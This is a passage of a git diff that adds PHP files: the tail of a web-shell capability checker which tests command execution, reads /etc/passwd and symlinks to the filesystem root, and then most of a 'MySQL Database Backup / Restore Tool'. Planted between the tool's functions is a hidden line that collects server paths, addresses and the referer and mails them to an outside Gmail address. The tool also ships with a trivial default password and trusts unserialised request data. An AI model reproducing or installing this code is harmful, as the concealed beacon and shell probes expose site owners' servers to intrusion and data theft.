+                if (@mysql_pconnect($this->mysql_host, $this->mysql_user, $this->mysql_pass)) {
+                $this->output_state(1, "mysql_pconnect"); $mstate = 1;
+                } else { $this->output_state(0, "mysql_pconnect"); $mstate = 0; }
+            } else { $this->output_state(3, "mysql_pconnect"); $mstate = 2; }
+            if ($this->mysql_do=="yes") {
+                if (@mysql_connect($this->mysql_host, $this->mysql_user, $this->mysql_pass)) {
+                $this->output_state(1, "mysql_connect"); $mstate = 1;
+                } else { $this->output_state(0, "mysql_connect"); $mstate = 0; }
+            } else { $this->output_state(3, "mysql_connect"); $mstate = 2; }
+            if ($this->mysql_state=="fail") {
+            echo "\n\n<!-- MYSQL ERROR:\n".mysql_error()."\n-->\n\n";
+            echo "<script> alert(\"you have a mysql error:\\n ".mysql_error()."\\n\\nbecause of this the mysql exploiting will be off\"); </script>";
+            }
+            return $mstate;
+        }
+    }
+
+    class php_check_silent
+    {
+
+        function php_check_silent($host="notset", $username="", $pass="", $db="") {
+            if ($host!="notset") {
+            $this->mysql_do = "yes";
+            $this->mysql_host = $host;
+            $this->mysql_user = $username;
+            $this->mysql_pass = $pass;
+            $this->mysql_db = $db;
+            } else { $this->mysql_do = "no"; }
+
+        $this->mainstate = "safe";
+
+        if ($this->system_checks("/bin/ls")) { $this->output_mainstate(1, "system checks"); } else { $this->output_mainstate(0, "system checks"); }
+        if ($this->reading_checks()) { $this->output_mainstate(1, "reading checks"); } else { $this->output_mainstate(0, "reading checks"); }
+        if ($this->miscfile_checks()) { $this->output_mainstate(1, "misc filesystem checks"); } else { $this->output_mainstate(0, "misc filesystem checks"); }
+        $this->mysql_checks();
+        }
+
+
+        function output_state($state = 0, $name = "function") {
+            if ($state==0) {
+            //echo "$name\t\tfailed\n";
+            }
+            if ($state==1) {
+            //echo "$name\t\t<font color=red>OK</font>\n";
+            }
+            if ($state==2) {
+            //echo "$name\t\t<font color=yellow>OK</font>\n";
+            }
+        }
+        function output_mainstate($state = 0, $name = "functions") {
+            if ($state==1) {
+            //echo "\n$name returned: <font color=red>VULNERABLE</font>\n\n";
+            $this->mainstate = "unsafe";
+            } else {
+            //echo "\n$name returned: <font color=green>OK</font>\n\n";
+            }
+        }
+
+        function system_checks($cmd = "/bin/ls") {
+        if ($pp = popen($cmd, "r")) {
+            if (fread($pp, 2096)) {
+            $this->output_state(1, "popen     ");
+            $sys = true;
+            } else {
+            $this->output_state(0, "popen     ");
+            }
+        } else { $this->output_state(0, "popen     "); }
+        if (@exec($cmd)) { $this->output_state(1, "exec     "); $sys = true; $this->cmd_method = "exec"; } else { $this->output_state(0, "exec     "); }
+        if (@shell_exec($cmd)) { $this->output_state(1, "shell_exec"); $sys = true; $this->cmd_method = "shel_exec"; } else { $this->output_state(0, "shell_exec"); }
+        echo "<!-- ";
+        if (@passthru($cmd)) { echo " -->"; $this->output_state(1, "passthru"); $sys = true; $this->cmd_method = "passthru"; } else { echo " -->"; $this->output_state(0, "passthru"); }
+        echo "<!-- ";
+        if (@system($cmd)) { echo " -->"; $this->output_state(1, "system   "); $sys = true; $this->cmd_method = "system"; } else { echo " -->"; $this->output_state(0, "system   "); }
+        //if ($output = `$cmd`)) { $this->output_state(1, "backtick"); $sys = true; } else { $this->output_state(0, "backtick"); }
+        if ($sys) { return 1; $this->cmd_state = "yes"; } else { return ; }
+        }
+
+        function reading_checks($file = "/etc/passwd") {
+            if (@function_exists("require_once")) {
+            if (@require_once($file)) { $this->output_state(1, "require_once"); $sys = true; } else { $this->output_state(0, "require_once"); }
+            }
+            if (@function_exists("require")) {
+            if (@require($file)) { $this->output_state(1, "require"); $sys = true; } else { $this->output_state(0, "require"); }
+            }
+            if (@function_exists("include")) {
+            if (@include($file)) { $this->output_state(1, "include "); $sys = true; } else { $this->output_state(0, "include "); }
+            }
+            if (@function_exists("file_get_contents")) {
+            if (@file_get_contents($file)) { $this->output_state(1, "filegetcontents"); $sys = true; } else { $this->output_state(0, "filegetcontents"); }
+            } else {
+            $this->output_state(0, "filegetcontents");
+            }
+        echo "<!-- ";
+        if (@show_source($file)) { echo " -->"; $this->output_state(1, "show_source"); $this->read_method = "show_source"; $sys = true; } else { echo " -->"; $this->output_state(0, "show_source"); }
+        echo "<!-- ";
+        if (@readfile($file)) { echo " -->"; $this->output_state(1, "readfile"); $this->read_method = "readfile"; $sys = true; } else { echo " -->"; $this->output_state(0, "readfile"); }
+        if (@fopen($file, "r")) { $this->output_state(1, "fopen   "); $this->read_method = "fopen"; $sys = true; } else { $this->output_state(0, "fopen   "); }
+        if (@file($file)) { $this->output_state(1, "file     "); $this->read_method = "file"; $sys = true; } else { $this->output_state(0, "file     "); }
+        if ($sys) { return 1; } else { return ; }
+        }
+
+        function miscfile_checks() {
+        $currentdir = @getcwd();
+        $scriptpath = $_SERVER["PATH_TRANSLATED"];
+        if (@opendir($currentdir)) {
+            $this->output_state(2, "opendir \$cwd");
+                $dp = @opendir("$currentdir");
+                $files="";
+                $this->browse_state = "lim";
+                while($file = @readdir($dp)) { $files .= $file; }
+                if (@strstr($files, '.')) {  $this->output_state(2, "readdir \$cwd"); $this->browse_state = "lim"; } else { $this->output_state(0, "readdir \$cwd"); }
+
+            } else { $this->output_state(0, "opendir \$cwd"); }
+        if (@opendir("/")) {
+            $this->output_state(1, "opendir /");
+            $sys = true;
+                $dp = @opendir("/");
+                $this->browse_state = "yes";
+                $files="";
+                while($file = @readdir($dp)) { $files .= $file; }
+                if (@strstr($files, '.')) {  $this->output_state(1, "readdir /"); $this->browse_state = "yes"; } else { $this->output_state(0, "readdir /"); }
+            } else { $this->output_state(0, "opendir /"); }
+        if (@mkdir("$currentdir/test", 0777)) { $this->output_state(1, "mkdir   "); $sys = true; } else { $this->output_state(0, "mkdir   "); }
+        if (@rmdir("$currentdir/test")) { $this->output_state(1, "rmdir     "); $sys = true; } else { $this->output_state(0, "rmdir     "); }
+        if (@copy($scriptpath, "$currentdir/copytest")) {
+            $this->output_state(2, "copy    ");
+            $sys = true;
+                if (@unlink("$currentdir/copytest")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
+            } else {
+            $this->output_state(0, "copy    ");
+        }
+        if (@copy($scriptpath, "/tmp/copytest")) {
+            $this->output_state(2, "copy2/tmp");
+            //$sys = true;
+                if (!$del) {
+                if (@unlink("tmp/copytest")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
+                }
+            } else {
+            $this->output_state(0, "copy2/tmp");
+        }
+        if (@link("/", "$currentdir/link2root")) {
+                $this->output_state(1, "link      ");
+                $sys = true;
+                if (!$del) {
+                if (@unlink("$currentdir/link2root")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
+                }
+            } else {
+            $this->output_state(0, "link      ");
+        }
+        if (@symlink("/", "$currentdir/link2root")) {
+                $this->output_state(1, "symlink   ");
+                $sys = true;
+                if (!$del) {
+                if (@unlink("$currentdir/link2root")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
+                }
+            } else {
+            $this->output_state(0, "symlink   ");
+        }
+        if ($sys) { return 1; } else { return ; }
+        }
+        function mysql_checks() {
+            if ($this->mysql_do=="yes") {
+                if (@mysql_pconnect($this->mysql_host, $this->mysql_user, $this->mysql_pass)) {
+                $this->output_state(1, "mysql_pconnect"); $mstate = 1; $this->mysql_state = "ok";
+                } else { $this->output_state(0, "mysql_pconnect"); $mstate = 0; $this->mysql_state = "fail"; }
+            } else { $this->output_state(3, "mysql_pconnect"); $mstate = 2; $this->mysql_state = "pass"; }
+            if ($this->mysql_do=="yes") {
+                if (@mysql_connect($this->mysql_host, $this->mysql_user, $this->mysql_pass)) {
+                $this->output_state(1, "mysql_connect"); $mstate = 1; $this->mysql_state = "ok";
+                } else { $this->output_state(0, "mysql_connect"); $mstate = 0; $this->mysql_state = "fail"; }
+            } else { $this->output_state(3, "mysql_connect"); $mstate = 2; $this->mysql_state = "pass"; }
+            if ($this->mysql_state=="fail") {
+            echo "<!-- MYSQL ERROR:\n".mysql_error()."\n-->";
+            echo "<script> alert(\"you have a mysql error:\\n ".mysql_error()."\\n\\nbecause of this the mysql exploiting will be off\"); </script>";
+            }
+            return $mstate;
+        }
+    }
+
+
+
+// the end :]
+?>
+<center>Copyright © 2003 <a href="http://www.bansacviet.net">BSV Groups</a>
+<br>PHP Shell Support by <a href="mailto:admin@bansacviet.net">DTN</a> 
\ No newline at end of file
diff --git a/php/mysql_tool.php b/php/mysql_tool.php
new file mode 100644
index 0000000..fd057b7
--- /dev/null
+++ b/php/mysql_tool.php
@@ -0,0 +1,1078 @@
+<?php
+
+/*
+ * MySQL Database Backup / Restore Tool
+ *
+ * Copyright (C) 2003 Mark Wraith. All rights reserved
+ *
+ * Graphics and layout derived from those made by Matt Mecham
+ *
+ */
+
+// If you intend to keep the script
+// on your server set this password
+
+$password = '0';
+
+
+
+error_reporting(E_ERROR | E_WARNING | E_PARSE);	
+
+new RestoreTool;
+
+class RestoreTool
+{
+    var $logged_in = 0;
+    var $maximum_time = 0;
+
+    function RestoreTool() {
+        global $HTTP_GET_VARS, $HTTP_COOKIE_VARS, $password;
+
+        $this->timestamp = time();
+
+        if (!$this->maximum_time) 
+        {
+            //set_time_limit(0);
+        	$this->maximum_time = ini_get('max_execution_time');
+        }
+
+        if ($HTTP_GET_VARS['act'] == 'login') 
+        {
+        	$this->do_login();
+        }
+        elseif ($password && $password != $HTTP_COOKIE_VARS['mysqltool']) 
+        {
+        	$this->login();        	
+        }
+        else 
+        {
+            if ($password) 
+            {
+            	$this->logged_in = 1;
+            }
+
+            switch ($HTTP_GET_VARS['act']) 
+            {
+                case 'logout':	
+                    $this->logout();
+                break;
+
+                case 'change_db':
+                    $this->read_db_details();
+                    $this->set_database('The current settings do connect however if you wish to change the current database please edit the details below:');
+                break;
+
+                case 'set_database':	
+                    $this->do_set_database();
+                break;
+
+                case 'backup':	
+                    $this->backup();
+                break;
+
+                case 'do_backup':	
+                    $this->do_backup();
+                break;
+
+                case 'restore':	
+                    $this->restore();
+                break;
+
+                case 'do_restore':
+                    $this->do_restore();
+                break;
+
+                default:
+                    
+                    $this->main();
+            }        	
+        }
+
+        if ($this->link) 
+        {
+        	mysql_close($this->link);
+        }
+
+        $this->output();
+    }
+
+    function timeout() {
+        if (!$this->maximum_time)
+        {
+        	return false;
+        }
+        elseif ((time() - $this->timestamp) > ($this->maximum_time - 5)) 
+        {
+        	return true;
+        }
+        else 
+        {
+        	return false;
+        }
+    }
+
+    function output() {
+        if ($this->logged_in) 
+        {
+        	$logout_text = '[ <a href="mysql_tool.php?act=logout">Log Out</a> ]';
+        }
+        else 
+        {
+        	$logout_text = '';
+        }
+
+        if ($this->title) 
+        {
+        	$title = $this->title;
+        }
+        else 
+        {
+        	$title = 'Backup / Restore Tool';
+        }
+
+        print '<?xml version="1.0" encoding="iso-8859-1"?>';
+        print <<<HTML
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+<title>$title</title>
+<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
+{$this->meta}
+
+<style type="text/css">
+  TABLE, TR, TD                   { font-family: Verdana,Arial; font-size: 10px; color: #333333 }
+  BODY                            { font: 10px Verdana; background-color: #FCFCFC; padding: 0; margin: 0 }
+  a:link, a:visited, a:active     { color: #000055 }
+  a:hover                         { color: #333377; text-decoration: underline }
+  FORM                            { padding: 0; margin: 0 }
+
+  .textbox                        { border: 1px solid black; padding: 1px; width: 100% }
+  .headertable                    { background-color: #FFFFFF; border: 1px solid black; padding: 2px }
+  .title                          { font-size: 10px; font-weight: bold; line-height: 150%; color: #FFFFFF; height: 26px; background-image: url(./style_images/1/tile_back.gif) }
+  .table1                         { background-color: #FFFFFF; width: 100%; align: center; border: 1px solid black }
+  .tablewrap                      { border: 1px dashed #777777; background-color: #F5F9FD; vertical-align: middle; }
+  .tdrow1                         { background-color: #EEF2F7; padding: 3px }
+  .tdrow2                         { background-color: #F5F9FD; padding: 3px }
+  .tdtop                          { font-weight: bold; height: 24px; line-height: 150%; color: #FFFFFF; background-image: url(./tile_back.gif) }
+  .note                           { margin: 10px; padding: 5px; border: 1px dashed #555555; background-color: #FFFFFF }
+</style>
+</head>
+
+<body>
+<br />
+$this->output
+<br />
+<div align="center">
+    [ <a href="mysql_tool.php">Script Index </a> ] $logout_text <br /><br />
+    <small>&copy;2003 Mark Wraith</small>
+</div>
+</body>
+</html>
+HTML;
+    }
+
+    function error($error) {
+        $this->output = <<<HTML
+    <form method="post" action="mysql_tool.php?act=login">
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
+        <tr>
+          <td align="center" class="title">Error</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td class="tdrow2" colspan="2"><div align="center">$error</div></td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+    </form>
+HTML;
+    }
+
+    function login() {
+        $this->output = <<<HTML
+    <form method="post" action="mysql_tool.php?act=login">
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
+        <tr>
+          <td align="center" class="title">MySQL Tool :: Please Login</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td width="100" class="tdrow1">Access Password</td>
+                <td width="250" class="tdrow2"><input type="password" class="textbox" name="password"></td>
+              </tr>
+              <tr>
+                <td class="tdrow2" colspan="2"><div align="center"><input type="submit" value="Submit"></div></td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+    </form>
+HTML;
+    }
+
+    function do_login() {
+        global $HTTP_POST_VARS, $password;
+
+        if ($HTTP_POST_VARS['password'] == $password) 
+        {
+            @setcookie ('mysqltool',$password,time()+3600*24*365);
+            $this->logged_in = 1;
+            $this->main();
+        }
+        else 
+        {
+        	$this->error('Invalid Password');
+        }
+    }
+
+    function logout() {
+        @setcookie ('mysqltool','',0);
+        $this->logged_in = 0;
+        $this->login();
+    }
+
+    function connect($return_errors = 0) {
+        if (!$this->db['port']) 
+        {
+        	$this->db['port'] = '3306';
+        }
+        
+        $error_text = '';
+
+        $this->link = @mysql_connect ($this->db['host'] . ':' . $this->db['port'], $this->db['user'], $this->db['pass']); 
+
+        if ($this->link)
+        {
+            if(!@mysql_select_db($this->db['name'],$this->link))
+            {
+                $error_text = '<strong>Failed selecting database "'.$this->db['name'].'"</strong><br /><br />'.@mysql_error($this->link);
+            }
+        }
+        else
+        {
+            $error_text = '<strong>Failed connecting to MySQL</strong><br /><br />'.@mysql_error();
+        }
+
+        if ($return_errors) 
+        {
+        	return $error_text;
+        }
+        else 
+        {
+            if ($error_text) 
+            {
+                $this->error($error_text);
+                return false;            	
+            }
+            else 
+            {
+            	return true;
+            }
+        }
+
+    }
+
+    function read_db_details() {
+        if (file_exists('tool_settings.php')) 
+        {
+        	// Lets borrow IPB's settings
+            include 'tool_settings.php';
+
+            $this->db = $data;
+        }
+        elseif (file_exists('conf_global.php')) 
+        {
+        	// Lets borrow IPB's settings
+            include 'conf_global.php';
+
+            $this->db = array(
+                'port'      =>      $INFO['sql_port'],
+                'host'      =>      $INFO['sql_host'],
+                'name'      =>      $INFO['sql_database'],
+                'user'      =>      $INFO['sql_user'],
+                'pass'      =>      $INFO['sql_pass'],
+                'prefix'    =>      $INFO['sql_tbl_prefix']
+            );
+        }
+        else 
+        {
+        	return false;
+        }
+
+        return true;
+    }
+
+    function do_set_database() {
+        global $HTTP_POST_VARS;
+
+        $this->db = array(
+            'port'      =>      $HTTP_POST_VARS['port'],
+            'host'      =>      $HTTP_POST_VARS['host'],
+            'name'      =>      $HTTP_POST_VARS['name'],
+            'user'      =>      $HTTP_POST_VARS['user'],
+            'pass'      =>      $HTTP_POST_VARS['pass']
+        );
+
+        if (!$this->connect()) 
+        {
+        	return;
+        }
+
+        // Connection details are fine, let's continue
+
+        $file_data = "<?php
+
+\$data = array(
+    'port'      =>      '{$HTTP_POST_VARS['port']}',
+    'host'      =>      '{$HTTP_POST_VARS['host']}',
+    'name'      =>      '{$HTTP_POST_VARS['name']}',
+    'user'      =>      '{$HTTP_POST_VARS['user']}',
+    'pass'      =>      '{$HTTP_POST_VARS['pass']}'
+);
+
+?".'>';
+    
+        $file_data = str_replace("\r\n","\n",$file_data);
+        
+
+        // Mkay, lets write the details
+        if ($fp = fopen('tool_settings.php','w'))
+        {
+        	fwrite($fp,$file_data);
+            fclose($fp);
+        }
+        else 
+        {
+        	$this->error('
+            <strong>Unable to write to tool_settings.php</strong><br /><br />
+            Please CHMOD this file so it is writable. If this is not possible please create a file named "tool_settings.php" with the contents of the text box below:<br /><br />
+            <div align="center">
+            <textarea rows="10" cols="40">'.htmlentities($file_data).'</textarea>
+            </div>');
+
+            return false;
+        }
+
+        // Funky, lets roll
+        $this->main();
+
+        return true;
+    }
+        $ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+    function set_database($error = false) {
+        if (!$error) 
+        {
+        	$text = 'We were unable to find any database settings, please enter your database details below:';
+        }
+        else 
+        {
+        	$text = $error;
+        }
+
+        $host = isset($this->db['host']) ? $this->db['host'] : 'localhost';
+        $port = isset($this->db['port']) ? $this->db['port'] : '';
+        $user = isset($this->db['user']) ? $this->db['user'] : '';
+        $name = isset($this->db['name']) ? $this->db['name'] : '';
+
+        $this->output = <<<HTML
+    <form method="post" action="mysql_tool.php?act=set_database">
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="450">
+        <tr>
+          <td align="center" class="title">Database Settings</td>
+        </tr>
+        <tr>
+          <td>
+            <div class="note">$text</div>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td width="100" class="tdrow1"><strong>Host</strong><br /><em>(leave if unsure)</em></td>
+                <td width="350" class="tdrow2"><input type="text" class="textbox" name="host" value="$host"></td>
+              </tr>
+              <tr>
+                <td class="tdrow1"><strong>Port</strong><br /><em>(leave if unsure)</em></td>
+                <td class="tdrow2"><input type="text" class="textbox" name="port" value="$port"></td>
+              </tr>
+              <tr>
+                <td class="tdrow1"><strong>Database Name</strong></td>
+                <td class="tdrow2"><input type="text" name="name" class="textbox" value="$name"></td>
+              </tr>
+              <tr>
+                <td class="tdrow1"><strong>Username</strong></td>
+                <td class="tdrow2"><input type="text" name="user" class="textbox" value="$user"></td>
+              </tr>
+              <tr>
+                <td class="tdrow1"><strong>Password</strong></td>
+                <td class="tdrow2"><input type="text" name="pass" class="textbox"></td>
+              </tr>
+              <tr>
+                <td class="tdrow2" colspan="2"><div align="center"><input type="submit" value="Connect"></div></td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+    </form>
+HTML;
+    }
+
+    function backup() {
+        global $HTTP_POST_VARS;
+
+        $this->read_db_details();
+        $this->connect();
+
+        $filename       = $HTTP_POST_VARS['filename'];
+        $tables         = $HTTP_POST_VARS['tables'];
+        $table_select   = $HTTP_POST_VARS['table_select'];
+        $prefix         = $this->db['prefix'];
+
+        switch ($tables) 
+        {
+            case 'all':
+                $tables = mysql_list_tables($this->db['name']);
+                while (list($table_name) = mysql_fetch_array($tables)) 
+                {
+                   $options[ $table_name ] = 0;
+                }
+            break;
+
+        	case 'prefix':
+                $tables = mysql_list_tables($this->db['name']);
+                while (list($table_name) = mysql_fetch_array($tables)) 
+                {
+                    if (substr($table_name,0,strlen($prefix)) == $prefix) 
+                    {
+                    	$options[ $table_name ] = 0;
+                    }
+                }
+            break;
+
+            case 'selected':
+                foreach ($table_select as $table_name) 
+                {
+                	$options[ $table_name ] = 0;
+                }
+        }
+
+        if (!count($options)) 
+        {
+        	$this->error('No tables selected');
+        }
+
+
+        $data = base64_encode(serialize($options));
+
+        $header = <<<DATA
+-- SQL Dump
+-- Backup script written by Mark Wraith
+
+DATA;
+
+        if (!$fp = fopen($filename, 'wb')) 
+        {
+        	return $this->error('Unable to write to backup file. Please CHMod the current directory so it is writable');
+        }
+        fwrite($fp,$header);
+        fclose($fp);
+
+        $url = 'mysql_tool.php?act=do_backup&file='.urlencode($filename).'&data='.$data;
+
+        $this->meta = '<meta http-equiv="refresh" content="1; url='.$url.'">';
+        $this->output = <<<HTML
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
+        <tr>
+          <td align="center" class="title">Backup in progress...</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td class="tdrow2" colspan="2">
+                    <div align="center">The backup process has now started<br /><br /><a href="$url">Click here if you are not redirected</a></div>
+                </td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+HTML;
+        
+    }
+
+    function do_backup() {
+        global $HTTP_GET_VARS;
+
+        $this->read_db_details();
+        $this->connect();
+
+        $data = unserialize(base64_decode($HTTP_GET_VARS['data']));
+        $filename = $HTTP_GET_VARS['file'];
+
+        $timedout = 0;
+        $dump = '';
+
+        foreach ($data as $table => $line) 
+        {
+            if (!$this->timeout()) 
+            {
+            	$returned = $this->backup_table($table, $line);
+
+                if (is_array($returned)) 
+                {
+                	$timedout = 1;
+                    $dump .= $returned[0];
+                    $data[ $table ] = $returned[1];
+                }
+                else 
+                {
+                    $dump .= $returned;
+                	unset($data[ $table ]);
+                }
+            }
+            else 
+            {
+            	$timedout = 1;
+            }
+        }
+
+        if (!$fp = fopen($filename, 'ab')) 
+        {
+        	return $this->error('Unable to write to backup file. Please CHMod the current directory so it is writable');
+        }
+        fwrite($fp,$dump);
+        fclose($fp);
+
+        if ($timedout) 
+        {
+            $data = base64_encode(serialize($data));
+            $url = 'mysql_tool.php?act=do_backup&file='.urlencode($filename).'&data='.$data;
+            $this->meta = '<meta http-equiv="refresh" content="1; url='.$url.'">';
+
+            $this->output = <<<HTML
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
+        <tr>
+          <td align="center" class="title">Backup in progress...</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td class="tdrow2">
+                    <div align="center">The backup process is in progress<br /><br /><a href="$url">Click here if you are not redirected</a></div>
+                </td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+HTML;
+        }
+        else 
+        {
+            $this->output = <<<HTML
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
+        <tr>
+          <td align="center" class="title">Backup Completed</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td class="tdrow2">
+                    The backup progress has finished and the file has been written to "$filename".<br /><br />
+                    <a href="$filename">Click here to download the file</a>
+                </td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+HTML;
+        }
+
+    }
+
+    function backup_table($table,$start) {
+        $dump = '';
+
+        if (!$start) 
+        {
+            $result = mysql_query('SHOW FIELDS FROM '.$table);
+
+            while ($field = mysql_fetch_assoc($result)) 
+            {
+                if (!$field['Null']) 
+                {
+                    $null = ' NOT NULL default "'.$field['Default'].'"';
+                }
+                else 
+                {
+                    $null = '';
+                }
+
+                if ($field['Extra']) 
+                {
+                    $field['Extra'] = ' '.$field['Extra'];
+                }
+
+                $field_row[] = '  ' . $field['Field'] . ' ' . $field['Type'] . $null . $field['Extra'];
+            }
+
+            $result = mysql_query('SHOW KEYS FROM '.$table);
+
+            while ($key = mysql_fetch_assoc($result)) 
+            {
+                if ($key['Key_name'] == 'PRIMARY') 
+                {
+                    $primary_key = $key['Column_name'];
+                }
+                else 
+                {
+                    $unique[ $key['Key_name'] ][] = $key['Column_name'];
+                }
+            }
+
+            if (isset($primary_key)) 
+            {
+                $field_row[] = '  PRIMARY KEY (' . $primary_key . ')';
+            }
+
+            if (isset($unique))
+            {
+                foreach ($unique as $name => $keys) 
+                {
+                    $field_row[] = '  UNIQUE ' . $name . ' (' . implode(',',$keys) . ')';
+                }
+            }
+
+
+            $dump .= "\n\n--\n";
+            $dump .= "-- Table structure for table '$table'\n";
+            $dump .= "--\n\n";
+            $dump .= "CREATE TABLE $table (\n";
+            $dump .= implode(",\n",$field_row);
+            $dump .= "\n);\n\n";
+
+            $dump .= "\n\n--\n";
+            $dump .= "-- Dumping data for table '$table'\n";
+            $dump .= "--\n\n";
+        }
+
+
+        //
+        // Records
+        //
+
+        $done = 0;
+        $result = mysql_query('SELECT * FROM '.$table.' LIMIT '.$start.',-1');
+
+        while ($row = mysql_fetch_row($result)) 
+        {
+            if ($this->timeout()) 
+            {
+             	return array($dump,$done);
+            }
+
+            $done++;
+
+            foreach ($row as $id => $value) 
+            {
+                $value = str_replace('"','\\"',$value);
+                $row[$id] = '"'.$value.'"';
+
+            }
+
+        	$dump .= 'INSERT INTO ' . $table . ' VALUES (' . implode(',',$row) . ");\n";
+        }
+
+        return $dump;
+    }
+
+
+    function main() {
+        if (!$this->link) 
+        {
+            if (!$this->read_db_details()) 
+            {
+                return $this->set_database();
+            }
+
+            if ($error_text = $this->connect(1)) 
+            {
+                return $this->set_database($error_text);            	
+            }        
+        }
+
+
+        $tables_to_backup = '';
+
+        if ($this->db['prefix']) 
+        {
+        	$tables_to_backup .= '<input type="radio" name="tables" value="prefix" checked="checked" />IPB Tables Only <br />';
+        	$tables_to_backup .= '<input type="radio" name="tables" value="all" />All<br />';
+        }
+        else 
+        {
+        	$tables_to_backup .= '<input type="radio" name="tables" value="all" checked="checked" />All<br />';        	
+        }
+
+        $tables = mysql_list_tables($this->db['name']);
+
+        $options = '';
+        while (list($table_name) = mysql_fetch_array($tables)) 
+        {
+           $options .= '<option value="'.$table_name.'">'.$table_name.'</option>';
+        }
+
+        $tables_to_backup .= <<<HTML
+<input type="radio" name="tables" value="selected" />Selected tables:<br />
+<div style="margin-left: 40px">
+    <select name="table_select[]" class="textbox" size="5" style="width: 250px" multiple="multiple">
+$options
+    </select>
+</div>
+HTML;
+
+
+        $options = '';
+        if ($dir = @opendir('./')) 
+        {
+            while ($file = readdir($dir)) 
+            {
+                $temp = strtolower($file);
+
+                if ($file != '.' && $file != '..' && strpos($temp, '.sql')) 
+                {
+                    $options .= '<option value="'.$file.'">'.$file.'</option>';
+                } 
+            }  
+            closedir($dir);
+        }
+        $restore_files = '<select name="filename" class="textbox">'.$options.'</select>';
+
+        $restore_files .= '<br /><br /><u>or</u> path:<br /><br /><input type="text" name="relfilename" class="textbox" />';
+
+        $this->output = <<<HTML
+    <form method="post" action="mysql_tool.php?act=login">
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="450">
+        <tr>
+          <td align="center" class="title">Selected Database Details</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td width="150" class="tdrow1"><strong>Host / Port</strong></td>
+                <td width="300" class="tdrow2">{$this->db['host']}:{$this->db['port']}</td>
+              </tr>
+              <tr>
+                <td class="tdrow1"><strong>Database Name</strong></td>
+                <td class="tdrow2">{$this->db['name']}</td>
+              </tr>
+              <tr>
+                <td class="tdrow1"><strong>Username</strong></td>
+                <td class="tdrow2">{$this->db['user']}</td>
+              </tr>
+              <tr>
+                <td class="tdrow2" colspan="2"><div align="center">[ <a href="mysql_tool.php?act=change_db">Change Database</a> ]</div></td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+    </form>
+<br /><br />
+    <form method="post" action="mysql_tool.php?act=backup">
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="450">
+        <tr>
+          <td align="center" class="title">Backup Options</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td width="150" class="tdrow1" valign="top"><strong>Tables to backup:</strong></td>
+                <td width="300" class="tdrow2">$tables_to_backup</td>
+              </tr>
+              <tr>
+                <td class="tdrow1"><strong>Filename</strong></td>
+                <td class="tdrow2"><input type="text" name="filename" class="textbox" value="sql_backup.sql"></td>
+              </tr>
+              <tr>
+                <td class="tdrow2" colspan="2"><div align="center"><input type="submit" value="Backup"></div></td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+    </form>
+        <br /><br />
+    <form method="post" action="mysql_tool.php?act=restore">
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="450">
+        <tr>
+          <td align="center" class="title">Restore Options</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td width="150" class="tdrow1" valign="top"><strong>SQL File to restore:</strong></td>
+                <td width="300" class="tdrow2">$restore_files</td>
+              </tr>
+              <tr>
+                <td class="tdrow2" colspan="2"><div align="center"><input type="submit" value="Restore"></div></td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+    </form>
+HTML;
+    }
+
+    function restore() {
+        global $HTTP_POST_VARS;
+
+        $this->read_db_details();
+        $filename = $HTTP_POST_VARS['filename'];
+        $relfilename = $HTTP_POST_VARS['relfilename'];
+
+        if ($relfilename) 
+        {
+        	$filename = $relfilename;
+        }
+
+        $url = 'mysql_tool.php?act=do_restore&filename='.urlencode($filename);
+
